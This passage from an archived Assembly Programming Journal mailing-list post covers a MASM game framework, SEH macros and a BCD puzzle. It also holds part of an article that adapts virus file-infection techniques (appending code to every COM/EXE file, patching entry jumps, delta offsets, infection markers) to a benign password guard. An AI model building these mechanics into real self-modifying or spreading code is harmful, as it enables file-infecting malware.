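    return callee(stack)


def subtract(stack):
    """Callee taking two arguments; it cleans the stack itself (RET 8)."""
    first = stack[-2]     # pushed last, so closest to the return address
    second = stack[-3]
    stack.pop()           # RET pops the return address ...
    del stack[-2:]        # ... and the "8" discards both arguments
    return first - second


if __name__ == "__main__":
    stack = []
    print(call_stdcall(stack, subtract, 10, 3))
    print("stack after the call:", stack)
```

Because the arguments go on in reverse, the first one always ends up nearest
the return address, and the caller gets its stack back exactly as it left it.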

Next, there is the issue of calling Windows functions. In order to use
INVOKE, you must have a function prototype. There is a program that comes
with MASM32 which builds include files ( equivalent to header files in C )
out of the VC++ libraries. Then, you include the needed libraries in your
code and you are free to make calls as you wish. You do have to build a
special include file by hand for access to Win32 structures and constants.
However, this too is included in the MASM32 package, and I have even put
together a special one for game programmers which will be included in the
source code and built upon as needed.

The final thing that I need to inform you about is the high level syntax
that MASM provides. These are constructs that allow you to create
If-Then-Else and For loops in assembly with C-like expressions. They are
easiest to show once we have some code to put in, therefore you won't see
them until next time. But, they are there ... and they make life 100000
times easier than without them.

That is really about all you need to know. The rest will come together as we
take a look at the source code and such. So, now that we have that out of
the way, we can work on designing the game and creating a code framework for
it.


The Design Document
-------------------
Time for something a lot more fun ... designing the game. This is a process
that is often neglected simply because people want to start writing code as
soon as they have an idea. Although this approach can work for some people,
it often does not. Or, if it does work, you end up re-coding a good portion
of your game because of a simple oversight. So, we will cover exactly how to
create a design document that you will be able to stick to, and will end up
helping you with your game.

First, you need to have an idea of what you want the game to be, and how you
want the game to play. In our case this is a simple Tetris clone, so there
isn't too much we need to cover in the way of game play and such. In many
cases though, you will need to describe the game play as thoroughly as
possible. This will help you see if your ideas are feasible, or if you are
neglecting something.

The easy part is finished; now we need to come up with as many details as we
possibly can. Are we going to have a scoring system? Are we going to have
load/save game options? How many levels are there? What happens at the end
of a level? Is there an introductory screen? These are the kinds of
questions that you should be asking yourself as you work on the design of
the game. Another thing that may help you is to storyboard or flow chart the
game on a piece of paper or your computer. This will allow you to see how
the game is going to progress at each point.

Once you have all of the details complete, it is time to start sketching the
levels out. How do you want the screens to appear? What will the interfaces
look like? This doesn't have to be precise just yet ... but it should give
you a realistic idea of what the final versions will look like. I tend to
break out my calculator and estimate positions at this point also. I have
actually run out of room while creating the menu screen before. This was my
own fault for not calculating the largest size my text could be, and it took
a few hours to re-do everything. Don't make the same mistake; plan ahead.

The final stage is just sort of a clean-up phase. I like to go back and make
sure that everything is the way I want it to be. Take a few days' break from
your game beforehand. This will give you a fresh viewpoint when you come
back to it later on. Oftentimes, you will stare at the document for so long
that something extraordinarily simple will be overlooked and not included in
your plan -- for instance, how many points everything is worth and the
maximum number of points the player can get ( Not that I have ever found out
halfway through the game that the player could obtain more points than the
maximum score allowed for, or anything like that ).

Whether you choose to use the process I have outlined, or one of your own
making, it is imperative that you complete this step. I have never been one
for wasted effort -- I do it right the first time if possible, and learn
from my mistakes, as well as the mistakes of others. If this weren't
necessary I wouldn't do it. So, do yourself a favor and complete a design
document no matter how simple you think your game is.

The final preparation step is something that I like to call code framework.
This is where you lay out your blank source code modules and fill them with
comments detailing the routines that will go into them and the basic idea
behind how they operate. If you think you are perfect and have gotten every
detail in your design document, then you can probably skip this step. But
those of you who, like me, are cautious should give this phase a whirl. It
helps you see how all of the pieces will fit together and, more importantly,
whether something has been neglected or included that shouldn't have been.

Here is an example of the framework that I am speaking about from
SPACE-TRIS. You can see that nothing much goes into it ... just an overview
of the module more or less.

;###########################################################################
; ABOUT SPACE-TRIS:
;
;     This is the main portion of code. It has WinMain and performs all
;     of the management for the game.
;
;           - WinMain()
;           - WndProc()
;           - Main_Loop()
;           - Game_Init()
;           - Game_Main()
;           - Game_Shutdown()
;
;
;###########################################################################

;###########################################################################
; THE COMPILER OPTIONS
;###########################################################################

       .386
       .MODEL flat, stdcall
       OPTION CASEMAP :none   ; case sensitive

;###########################################################################
; THE INCLUDES SECTION
;###########################################################################

       ;==================================================
       ; This is the include file for the Windows structs,
       ; unions, and constants
       ;==================================================
       INCLUDE Includes\Windows.inc

       ;================================================
       ; These are the Include files for Window calls
       ;================================================
       INCLUDE \masm32\include\comctl32.inc
       INCLUDE \masm32\include\comdlg32.inc
       INCLUDE \masm32\include\shell32.inc
       INCLUDE \masm32\include\user32.inc
       INCLUDE \masm32\include\kernel32.inc
       INCLUDE \masm32\include\gdi32.inc

       ;====================================
       ; The Direct Draw include file
       ;====================================
       INCLUDE Includes\DDraw.inc

       ;===============================================
       ; The Lib's for those included files
       ;================================================
       INCLUDELIB \masm32\lib\comctl32.lib
       INCLUDELIB \masm32\lib\comdlg32.lib
       INCLUDELIB \masm32\lib\shell32.lib
       INCLUDELIB \masm32\lib\gdi32.lib
       INCLUDELIB \masm32\lib\user32.lib
       INCLUDELIB \masm32\lib\kernel32.lib

       ;=================================================
       ; Include the file that has our prototypes
       ;=================================================
       INCLUDE Protos.inc

;###########################################################################
; LOCAL MACROS
;###########################################################################

       szText MACRO Name, Text:VARARG
             LOCAL lbl
             JMP lbl
             Name DB Text,0
             lbl:
       ENDM

       m2m MACRO M1, M2
             PUSH        M2
             POP         M1
       ENDM

       return MACRO arg
             MOV   EAX, arg
             RET
       ENDM

       RGB MACRO red, green, blue
             XOR   EAX,EAX
             MOV   AH,blue
             SHL   EAX,8
             MOV   AH,green
             MOV   AL,red
       ENDM

       hWrite MACRO handle, buffer, size
             MOV   EDI, handle
             ADD   EDI, Dest_index
             MOV   ECX, 0
             MOV   CX, size
             ADD   Dest_index, ECX
             MOV   ESI, buffer
             rep movsb
       ENDM

       hRead MACRO handle, buffer, size
             MOV   EDI, handle
             ADD   EDI, Spot
             MOV   ECX, 0
             MOV   CX, size
             ADD   Spot, ECX
             MOV   ESI, buffer
             rep movsb
       ENDM

;##############################################################################
; Variables we want to use in other modules
;##############################################################################


;##############################################################################
; External variables
;##############################################################################


;##############################################################################
; BEGIN INITIALIZED DATA
;##############################################################################

     .DATA

;##############################################################################
; BEGIN CONSTANTS
;##############################################################################


;##############################################################################
; BEGIN EQUATES
;##############################################################################

       ;=================
       ;Utility Equates
       ;=================
FALSE       EQU   0
TRUE        EQU   1


;##############################################################################
; BEGIN THE CODE SECTION
;##############################################################################

   .CODE

start:

;########################################################################
; WinMain Function
;########################################################################


;########################################################################
; End of WinMain Procedure
;########################################################################



;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################


;########################################################################
; End of Main Windows Callback Procedure
;########################################################################




;========================================================================
; THE GAME PROCEDURES
;========================================================================


;########################################################################
; Game_Init Procedure
;########################################################################


;########################################################################
; END Game_Init
;########################################################################



;########################################################################
; Game_Main Procedure
;########################################################################


;########################################################################
; END Game_Main
;########################################################################



;########################################################################
; Game_Shutdown Procedure
;########################################################################


;########################################################################
; END Game_Shutdown
;########################################################################

;######################################
; THIS IS THE END OF THE PROGRAM CODE #
;######################################
END start
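
Of the macros in the framework, RGB is the one whose result is least obvious
at a glance. The Python sketch below walks through the same five
instructions on a plain integer standing in for EAX; the rgb() function is
only a model written for this note, not part of the SPACE-TRIS source.

```python
def rgb(red, green, blue):
    """Mirror the RGB macro step by step; returns the final EAX value."""
    red, green, blue = red & 0xFF, green & 0xFF, blue & 0xFF
    eax = 0                                # XOR EAX,EAX
    eax = (eax & ~0xFF00) | (blue << 8)    # MOV AH,blue
    eax = (eax << 8) & 0xFFFFFFFF          # SHL EAX,8
    eax = (eax & ~0xFF00) | (green << 8)   # MOV AH,green
    eax = (eax & ~0xFF) | red              # MOV AL,red
    return eax


if __name__ == "__main__":
    print(hex(rgb(0x11, 0x22, 0x33)))
```

The macro therefore leaves blue in bits 16-23, green in bits 8-15 and red in
the low byte, with the top byte zero.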


Well, this is the end of the first article. The good news is all of the dry
boring stuff is behind us. The bad news is you won't get to see any code
until I complete the next article. In the meantime I would suggest brushing
up on your assembly language and maybe searching on the Internet for some
references on Win32 assembly language. You can find links to a lot of Win32
ASM resources at my website:
     http://www.fastsoftware.com.

Researching more information isn't a must ... but for those of you that
still think this might be difficult, I would suggest taking the time to do
so. It isn't like you will be hindered by learning more. You may find
another resource that helps you learn this stuff and that is ALWAYS a good
thing.

In the next article we will get a skeleton version of SPACE-TRIS up and
running along with coding our Direct Draw library functions. The goal is to
get a bitmap up onto the screen and I think we can accomplish it next time.
If everything goes as planned, you should see the work starting to pay off
in a loading game screen. I know it doesn't sound like much ... but
appreciate how slowly we are progressing before we get further along.
Because once we have the basics down, we are going to pull out all of the
stops and then you will be thankful we took the extra time to cover this
stuff.

So young grasshoppers, until next time ... happy coding.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                                     SEH.INC
                                                                by X-Calibre
;Summary:       Macros for Structured Exception Handling
;Compatibility: MASM, Win32
;Notes:         Demonstration code contained in SEH.ASM, below

IFNDEF RaiseException
      RaiseException PROTO STDCALL dwExceptionCode:DWORD,
                                   dwExceptionFlags:DWORD,
                                   nNumberOfArguments:DWORD,
                                   lpArguments:PTR DWORD
ENDIF

includelib kernel32.lib

TRY       MACRO
      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Install exception handler
      push @@handler
      push dword ptr fs:[0]
      mov       fs:[0], esp
      POPCONTEXT     ASSUMES
ENDM

CATCH     MACRO     exception
      LOCAL     @@invokeHandler

      jmp       @@removeHandler

@@handler:
IFNB <exception>
      mov       eax, [esp+4]
      cmp       dword ptr [eax], exception
      je        @@invokeHandler

      mov       eax, 1
      ret

@@invokeHandler:
ENDIF
ENDM

ENDC MACRO
      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Restore state
      mov       esp, dword ptr fs:[0]
      mov       esp, [esp]

@@removeHandler:
      pop       fs:[0]
      add       esp, 4

      POPCONTEXT     ASSUMES
ENDM

FINALLY   MACRO
      @@handler:
ENDM

ENDF MACRO
      LOCAL     @@removeHandler

      PUSHCONTEXT    ASSUMES
      assume fs:nothing
      ; Restore state
      cmp       esp, dword ptr fs:[0]
      je        @@removeHandler
      mov       esp, dword ptr fs:[0]
      mov       esp, [esp]

@@removeHandler:
      pop       fs:[0]
      add       esp, 4

      POPCONTEXT     ASSUMES
ENDM

THROW     MACRO     exception
      INVOKE    RaiseException, exception, 0, 0, NULL
ENDM

; ---- flags ---
EXCEPTION_INT_DIVIDE_BY_ZERO  equ  0C0000094h


                                                                     SEH.ASM
                                                                by X-Calibre
;Summary:       Sample program for using SEH.INC
;Compatibility: MASM, Win32
.386
.Model Flat, StdCall

include windows.inc
include user32.inc

include SEH.inc

includelib user32.lib

.code
tst  PROC
      THROW     0E0000001h
      ret
tst  ENDP

start:
main PROC
      TRY
           sub       edx, edx
           mov       ecx, 0
           idiv ecx

      CATCH(EXCEPTION_INT_DIVIDE_BY_ZERO)
           .data
           exceptionMsg   BYTE "Exception occurred",0

           .code
           INVOKE    MessageBox, NULL, ADDR exceptionMsg, ADDR exceptionMsg,
                     MB_OK
      ENDC
main ENDP

blah PROC
      TRY
           call tst
      FINALLY
           .data
           finallyMsg     BYTE "In FINALLY-block",0

           .code
           INVOKE    MessageBox, NULL, ADDR finallyMsg, ADDR finallyMsg,
                     MB_OK
      ENDF
blah ENDP

      .data
      finishMsg BYTE "Program finished",0

      .code
      INVOKE    MessageBox, NULL, ADDR finishMsg, ADDR finishMsg, MB_OK

      ret
end start



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                            by Angel Tsankov


Challenge
---------
Write the shortest possible program to convert a two-digit packed BCD value
to binary; that is, the decimal representation of the output must match the
hexadecimal representation of the input. For example, an input of 42h must
produce 42 ( 2Ah ).

Solution
--------
The solution, in 14 bytes:
     ;Input  AL = (A * 16) + B
     ;Output AL = (A * 10) + B
     88 C4      MOV  AH, AL       ;AH = AL
     82 E4 F0   AND  AH, 0F0h     ;AH = (A * 16)
     D0 EC      SHR  AH, 1        ;AH = (A * 8)
     28 E0      SUB  AL, AH       ;AL = (A * 8) + B
     C0 EC 02   SHR  AH, 2        ;AH = A * 2
     00 E0      ADD  AL, AH       ;AL = (A * 10) + B
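
The six instructions can be checked for every valid input with a short
Python model. This is a sketch written for verification only; the function
name bcd_to_binary() is made up here, and the registers are plain integers
masked to 8 bits.

```python
def bcd_to_binary(al):
    """Follow the six instructions of the solution on 8-bit registers."""
    ah = al                  # MOV AH, AL
    ah &= 0xF0               # AND AH, 0F0h   -> A * 16
    ah >>= 1                 # SHR AH, 1      -> A * 8
    al = (al - ah) & 0xFF    # SUB AL, AH     -> A * 8 + B
    ah >>= 2                 # SHR AH, 2      -> A * 2
    al = (al + ah) & 0xFF    # ADD AL, AH     -> A * 10 + B
    return al


if __name__ == "__main__":
    for tens in range(10):
        for ones in range(10):
            packed = tens * 16 + ones
            assert bcd_to_binary(packed) == tens * 10 + ones
    print("all 100 two-digit BCD values convert correctly")
```

The trick is that 16A - 8A + 2A = 10A, so one mask, two shifts, one subtract
and one add replace a multiplication by ten.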

Submitted by Angel Tsankov <fn42551@...>.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#16 From: "Michael Mondragon" <mammon_@...>
Date: Tue Feb 22, 2000 10:13 am
Subject: APJ Issue#7 Dec 99-Feb 00
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Dec 99-Feb 00
:::\_____\::::::::::.                                             Issue 7
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Extending DOS Executables"..........................Digital.Alchemist

"Creating a User-Friendly Interface"......................S.Sirajudeen

"ASM Building Blocks"...................................Laura.Fairhead

"Converting Strings to Numbers"...........................Chris.Dragan

"List Scan Library Routine".............................Laura.Fairhead

"Using the RTC"..........................................Jan.Verhoeven

"Chaos Animation".......................................Laura.Fairhead

"Inline Assembler With Modula"...........................Jan.Verhoeven

"Assembly on the Alpha Platform"........................Rudolf.Seemann

Column: Win32 Assembly Programming
     "Direct Draw Samples"....................................X-Calibre

Column: The Unix World
     "Enter fbcon".................................Konstantin.Boldyshev

Column: Assembly Language Snippets
     "ToHex".....................................................Ronald
     "Hex2ASCII"................................................cpuburn
     "MMX ltostr".....................................Cecchinel.Stephan

Column: Issue Solution
     "ScreenDump"........................................Laura.Fairhead

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
             Dump the contents of the current console to a file
----------------------------------------------------------------------










::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                  by mammon_


What? Late again? Wasn't there going to be a December issue?

Well, yeah, there was; unfortunately once again real-world concerns
interfered with timely distribution. And, as usually happens with late
issues, this one is waaaaay oversized, almost 200K due to all the articles I
crammed into it. I didn't even get a chance to include my linux kernel
modules article...

This issue seems to have a bit of a 'Hex-to-ASCII' bent to it, mostly from
the snippets but also from the conversion routines offered by Chris and
Laura. In addition, some 'fringe' asm has been supplied with Jan's Modula
article, along with an introduction to Alpha assembly language by Rudolf
Seemann. Konstantin Boldyshev, who helps maintain the linuxassembly.org
site, continues the Unix trend with an introduction to frame-buffer
programming under linux.

The two leading articles are both quite large and offer a wealth of
information for the beginning and experienced asm programmer. Digital
Alchemist has produced a work on applying virus techniques to
non-destructive applications, and S. Sirajudeen has tackled the huge
problem of creating a decent UI in console-mode programs.

In this issue I have tried to leave the code comments as untouched as
possible; the coding styles of the authors vary quite widely, and each
clearly demonstrates the planning behind the program itself -- showing how
the algorithm was conceived before implementation. Stripping any of these
examples of all but comments will soon reveal the worksheet used by the
coders to develop their programs.

Finally, I have taken to formatting these issues in Vim under linux; to
check margins and pagination I have begun proofing them in Netscape and
WordPerfect [10 pt Courier, natch]; they should view fine in any web
browser and in most word processors; to those stuck with Notepad or
Edit.com ... my apologies.

_m



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                 Extending DOS Executables
                                                 by Digital Alchemist


The reason behind this essay is to show how techniques first developed by
virus writers can be used for benevolent purposes.  It is my opinion that
all knowledge is good and viral techniques are certainly no exception.  I
will lead you through the development of a program called DOSGUARD which
benignly modifies DOS executables, both COM and EXE.


DESCRIPTION OF DOSGUARD
-----------------------
DOSGUARD is a DOS COM program which I developed in order to restrict access
to certain programs on my computer.  DOSGUARD modifies all of the COM and
EXE files in the current directory, adding code to each one that requires
the user to correctly enter a password before running the original program.

DOSGUARD, while sufficient for this article, could use a little work in the
realm of user friendliness.  It needs more user feedback and a better way
to specify which files are to be modified.  In addition, I have written a
version of DOSGUARD that uses simple xor encryption to improve security.

DOSGUARD was written using Turbo Assembler.


STRUCTURE OF COM FILES
----------------------
Unlike the EXE file format, the programmer has no input into the segment
format of COM files.  All COM files consist of 1 segment only, with no
predefined distinction between data and code.  After DOS finishes some
preparatory work, the COM file is loaded at offset 100h.  The first 256
bytes of the segment are known as the Program Segment Prefix (PSP).
Located at offset 80h is an important data structure called the DTA or Data
Transfer Area.  The DTA is important, but most of the rest of the PSP can
be ignored by the programmer.  Before actually starting execution of the
COM program, DOS sets up the stack at the top of the segment (the highest
memory address).


OUTLINE OF COM MODIFICATION
---------------------------
1. Open the file and read the first 5 bytes.
2. Make sure the file is not really an EXE file, because after DOS 6.0 some
    files ending in ".com" were really EXEs.
3. Check to see if the file has already been modified by DOSGUARD by
    checking if the values of the 4th and 5th bytes match the DOSGUARD
    identification string of "CG".
4. Make sure the file is small enough that it still fits in one 64k segment
    after DOSGUARD adds its code.
5. If the file passes 2-4 then it's ok to modify, so DOSGUARD writes its
    code to the end of the file.
6. Calculate the size of the jump to the code we added and write the jump
    instruction along with the identification string to the beginning of the
    file.

I'll go over each of these steps in a little more detail with code snippets
where necessary.  The complete source code for DOSGUARD can be found at the
end of the article and at my web page.  Hopefully, the comments will be
enough to explain any areas I don't discuss in detail.

Essentially, the way DOSGUARD modifies COM files is by inserting a jump at
the beginning of the file which goes straight to the password
authentication code, located at the end of the file.  If the correct
password is entered by the user, then the inserted code will restore the 5
bytes that were overwritten by the jump and the identification string and
execute the program just like DOSGUARD was never there.


COM MODIFICATION - STEP 1
-------------------------
Once we've found a COM file, the first thing to do is open it.  Then, after
running some tests on the file, we can determine if it is suitable for
modification.  But first, we need to read the first 5 bytes because we'll
need them later.

         mov     ax, 3D02h               ;Open file R/W
         mov     dx, 9Eh                 ;Filename, stored in DTA
         int     21h
         mov     bx, ax                  ;Save file handle in bx
         mov     ax, 3F00h               ;Read first 5 bytes from file
         mov     cx, 5
         mov     dx, offset obytes
         int     21h


COM MODIFICATION - STEP 2
-------------------------
After DOS 6.0, some files with the COM extension are actually EXEs.
COMMAND.COM, for instance, is one of these.  If we try to modify an EXE file
as if it were a COM file, then we're going to really screw things up.  To
prevent this, we make sure that the string "MZ" doesn't appear in the first
two bytes of the file.  "MZ" is the string which tells DOS that a file is an
EXE.

         ;Check to see if file is really an EXE
         cmp     word ptr[obytes], 'ZM'
         je      EXE
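
The operand reads 'ZM' rather than 'MZ' because the x86 stores a word low
byte first.  Here is a small Python check of that byte order; the helper
name starts_with_mz is made up for this illustration and is not part of
DOSGUARD.

```python
import struct

def starts_with_mz(first_bytes: bytes) -> bool:
    """Return True when the first two bytes of a file are 'M', 'Z'."""
    # Read bytes 0-1 as one little-endian 16-bit word, which is what
    # "cmp word ptr [obytes], ..." sees on an x86.
    (word,) = struct.unpack_from("<H", first_bytes, 0)
    # The assembler turns 'ZM' into 5A4Dh: 'Z' (5Ah) high, 'M' (4Dh) low.
    return word == 0x5A4D
```

A file that literally began with the bytes 'Z', 'M' would not match.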


COM MODIFICATION - STEP 3
-------------------------
If the file had been previously altered by DOSGUARD, then the 4th and 5th
bytes will contain the identification string "CG".  We need to make sure we
skip files that have this identification string.

         ;Check to see if file is already infected
         ;if it is, then skip it
         cmp     word ptr [obytes + 3], 'GC'
         je      NO_INFECT


COM MODIFICATION - STEP 4
-------------------------
Another thing to watch out for is the file's size.  If the file will exceed
one segment in size when we add our code, then the file is too big to
modify.

         ;Make sure file isn't too large
         mov     ax, ds:[009Ah]          ;Size of file from DTA
         add     ax, offset ENDGUARD - offset COMGUARD + 100h
         jc      NO_INFECT               ;If ax overflows then don't infect
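
Steps 2 through 4 boil down to three tests on the first 5 bytes and the
file size.  A rough Python sketch follows; the function name and the
guard_len parameter (standing in for ENDGUARD - COMGUARD) are assumptions
made for the example.

```python
def com_can_be_modified(first5: bytes, file_size: int, guard_len: int) -> bool:
    """Apply the Step 2-4 checks to a COM candidate."""
    if first5[:2] == b"MZ":      # Step 2: really an EXE in disguise
        return False
    if first5[3:5] == b"CG":     # Step 3: already carries the DOSGUARD mark
        return False
    # Step 4: mirror "add ax, guard_len + 100h / jc NO_INFECT".
    # The sum must still fit in 16 bits, i.e. inside one 64k segment.
    return file_size + guard_len + 0x100 <= 0xFFFF
```

The 100h in the size test accounts for the PSP that sits in front of the
program in its segment.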


COM MODIFICATION - STEP 5
-------------------------
If the file is a suitable candidate for modification, then we simply write
our code to the end of the file.  Also, we have to save the original first
5 bytes from the file somewhere in our code.  In DOSGUARD's case, the 5
bytes are already saved in the proper place because "obytes" is located
within the code which we are about to write.

         xor     cx, cx                  ;cx = 0
         xor     dx, dx                  ;dx = 0
         mov     ax, 4202h               ;Move file pointer to end of file
         int     21h

         mov     ax, 4000h               ;Write the code to the end of file
         mov     dx, offset COMGUARD
         mov     cx, offset ENDGUARD - offset COMGUARD
         int     21h


COM MODIFICATION - STEP 6
-------------------------
The final step is to calculate the size of the jump to our code and write
the opcode for the jump and the identification string over the first 5
bytes of the file.

         mov     ax, 4200h               ;Move file pointer to beginning of
         xor     cx, cx                  ; file to write jump
         xor     dx, dx
         int     21h

         ;Prepare the jump instruction to be written to beginning of file
         mov     byte ptr [bytes], 0E9h  ;opcode for near jmp
         mov     ax, ds:[009Ah]          ;size of the file
         sub     ax, 3                   ;minus size of the jump instruction
         mov     word ptr [bytes + 1], ax;= displacement of the jump

         ;Write the jump
         mov     cx, 5                   ;size to be written
         mov     dx, offset bytes
         mov     ax, 4000h
         int     21h

         mov     ah, 3Eh                 ;Close file
         int     21h
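
To see what actually lands in those 5 bytes, here is a Python sketch that
builds the same patch.  The name build_com_patch is hypothetical, and
host_size is the size of the file before anything was appended.

```python
import struct

def build_com_patch(host_size: int) -> bytes:
    """Return the 5 bytes written over the start of a COM file."""
    # The jump sits at file offset 0 and is 3 bytes long, so the CPU
    # measures the displacement from offset 3.  The appended code starts
    # at offset host_size, hence displacement = host_size - 3.
    displacement = (host_size - 3) & 0xFFFF
    return b"\xE9" + struct.pack("<H", displacement) + b"CG"
```

For a 200h byte host this gives E9 FD 01 43 47: a near jump of 1FDh
followed by the "CG" mark.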


RESPONSIBILITIES OF INSERTED CODE
---------------------------------
There are two problems which the inserted code has to deal with.  First,
since the code could be located at any arbitrary offset within the segment,
it cannot depend on the compiled absolute addresses of its data labels.  To
solve this problem we use a technique virus writers call the delta offset.
The delta offset is the difference between the actual and compiled
addresses of data.  Anytime our code accesses data in memory it adds the
delta offset to the data's compiled address.  The following piece of code
finds the delta offset.

         call    GET_START
         GET_START:
         pop     bp
         sub     bp, offset GET_START

The "call" pushes its return address onto the stack, which is the actual
address of the label "GET_START."  Pop it, subtract the compiled address
from the actual one, and there's our delta offset.
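
The arithmetic is easy to try out in Python.  The addresses in the note
below are invented for illustration, and both helper names are
assumptions.

```python
def delta_offset(actual_ip: int, compiled_offset: int) -> int:
    """Difference between where a label is and where it was assembled."""
    return (actual_ip - compiled_offset) & 0xFFFF   # 16-bit wraparound

def runtime_address(compiled_offset: int, delta: int) -> int:
    """Address to use at run time for data assembled at compiled_offset."""
    return (compiled_offset + delta) & 0xFFFF
```

If GET_START was assembled at 0350h but the popped value is 1310h, the
delta is 0FC0h, and a variable assembled at 0400h really lives at 13C0h.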

The second problem is to make sure the first 5 bytes of the host are
restored to their original values before we return from our jump and
execute the host.


STRUCTURE OF EXE FILES
----------------------
The EXE file format is much more complicated than the COM format.  The big
difference is that EXE files allow the program to specify how it wants its
segments to be laid out in memory, allowing programs to exceed one 64k
segment in size.  Most EXEs will have separate code, data, and stack
segments.

All of this information is stored in the EXE Header.  Here's a brief
rundown of what the header looks like:

         Offset  Size    Field
         0       2       Signature.  Will always be 'MZ'
         2       2       Last Page Size.  Number of bytes on the last
                         page of memory.
         4       2       Page Count.  Number of 512 byte pages in the file.
         6       2       Relocation Table Entries.  Number of items in the
                         relocation pointer table.
         8       2       Header Size.  Size of header in paragraphs,
                         including the relocation pointer table.
         10      2       Minalloc
         12      2       Maxalloc
         14      2       Initial Stack Segment.
         16      2       Initial Stack Pointer.
         18      2       Checksum.  (Usually ignored)
         20      2       Initial Instruction Pointer
         22      2       Initial Code Segment
         24      2       Relocation Table Offset.  Offset to the start of
                         the relocation pointer table.
         26      2       Overlay Number.  Primary executables(the ones we
                         wish to modify) always have this set to zero.
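
For experimenting outside of DOS, the same 28 byte layout can be unpacked
with a few lines of Python.  The field names are my own shorthand for the
table above, not official names.

```python
import struct
from collections import namedtuple

ExeHeader = namedtuple(
    "ExeHeader",
    "signature last_page_size page_count reloc_count header_paras "
    "minalloc maxalloc init_ss init_sp checksum init_ip init_cs "
    "reloc_offset overlay",
)

def parse_exe_header(data: bytes) -> ExeHeader:
    """Unpack the first 28 bytes of a DOS EXE into named fields."""
    if len(data) < 28:
        raise ValueError("need at least 28 bytes of header")
    # A 2 byte signature followed by thirteen little-endian words.
    return ExeHeader._make(struct.unpack_from("<2s13H", data, 0))
```

The position of each field in the tuple matches its row in the table, so
init_cs is the word at offset 22 and reloc_offset the word at offset 24.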

Following the EXE header is the relocation pointer table, with a variable
amount of blank space between the header and the start of the table.  The
relocation table is a table of segment:offset pointers, stored offset
first.  Each pointer is combined with the starting segment value calculated
by DOS to locate a word in memory, and DOS adds that starting segment to
the word to produce the final segment address.  Essentially, the relocation
pointer table is DOS's way to handle the dynamic placement of segments into
physical memory.  This isn't a problem with COM files because there is only
one segment and the program isn't aware of anything else.  Following the
relocation pointer table is another variable amount of reserved space and
finally the program body.

To successfully add code to an EXE file requires careful manipulation of
the EXE header and relocation pointer table.


OUTLINE OF EXE MODIFICATION
---------------------------
1.  Open the file and read the 1st 2 bytes (DOSGUARD actually reads 5).
2.  Check for EXE signature "MZ".
3.  Read the EXE header.
4.  Check the file for previous infection.
5.  Make sure that the Overlay Number is 0.
6.  Make sure the file is a DOS EXE.
7.  If the file passes 2-6 then it is ok to modify.  The first step is to
     check the relocation pointer table to see if there is room to add 2
     pointers.  If there is room, then jump to step 9.
8.  If there isn't enough room in the relocation pointer table, then
     DOSGUARD has to make room.  It reads in the entire file after the
     relocation pointer table and writes it back out one paragraph higher
     in the file.
9.  Save the original ss, sp, cs, and ip.
10. Adjust the file length to a paragraph boundary.
11. Write code to the end of the file.
12. Adjust the EXE header to reflect the new starting segments and file
     size.
13. Write out the header.
14. Modify the relocation pointer table.

The easiest way to think about EXE modification is to imagine that we are
adding a complete COM program to the end of the file.  Our code will occupy
its own segment located just after the host.  This one segment will serve
as a code, data, and stack segment just like in a COM program.  Instead of
inserting a jump to take us there, we will simply adjust the starting
segment values in the EXE header to point to our segment.


EXE MODIFICATION - STEP 1
-------------------------
The same as with COM files, except that the only bytes we actually need are
the first two.  With EXE files we will use different methods for
determining previous modification (I try to avoid using the viral term
"infection") and for transferring execution to our code.


EXE MODIFICATION - STEP 2
-------------------------
Check the first two bytes for the EXE signature "MZ".  If the file doesn't
start with "MZ," then it isn't a DOS EXE.

         cmp     word ptr[obytes], 'ZM'
         je      EXE


EXE MODIFICATION - STEP 3
-------------------------
Now, DOSGUARD simply reads the EXE header into a 28 byte buffer.  Later, we
will make the necessary changes to the header and write it back out.

         xor     cx, cx                  ;Move the file pointer back
         xor     dx, dx                  ;to the beginning of the file
         mov     ax, 4200h
         int     21h
         mov     cx, 1Ch                 ;read exe header (28 bytes)
         mov     dx, offset exehead      ;into buffer
         mov     ah, 3Fh
         int     21h


EXE MODIFICATION - STEP 4
-------------------------
We don't use a signature string to mark EXE files.  Instead, we compare the
code entry point with the size of the file.  If the file has been
previously modified by DOSGUARD, then we know that the distance of the code
entry point from the end of the file will be the length of the code that
DOSGUARD adds.  To put things in mathematical terms:

         (initial cs * 16) + (size of code DOSGUARD adds) + (size of header)

will equal the size of the file.  The initial cs times 16 is the code entry
point, of course (DOSGUARD always sets the initial ip to 0).  You have to
add the header size because it isn't loaded into memory along with the rest
of the code and data.

         ;Make sure it hasn't already been infected
         ;If (initial CS * 16) + (size of code) + (size of header)
         ;  == filesize then the file has already been infected
         mov     ax, word ptr [exehead+22]
         mov     dx, 16
         mul     dx
         add     ax, offset ENDGUARD2 - offset EXEGUARD
         adc     dx, 0
         mov     cx, word ptr [exehead+8]
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     ax, cx
         adc     dx, 0
         cmp     ax, word ptr cs:[9Ah]
         jne     EXEOK
         cmp     dx, word ptr cs:[9Ch]
         je      NO_INFECT
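
The same test written out in Python, with numbers you can check by hand.
The function name and guard_len (standing in for ENDGUARD2 - EXEGUARD) are
placeholders for this sketch.

```python
def exe_already_modified(init_cs: int, header_paras: int,
                         guard_len: int, file_size: int) -> bool:
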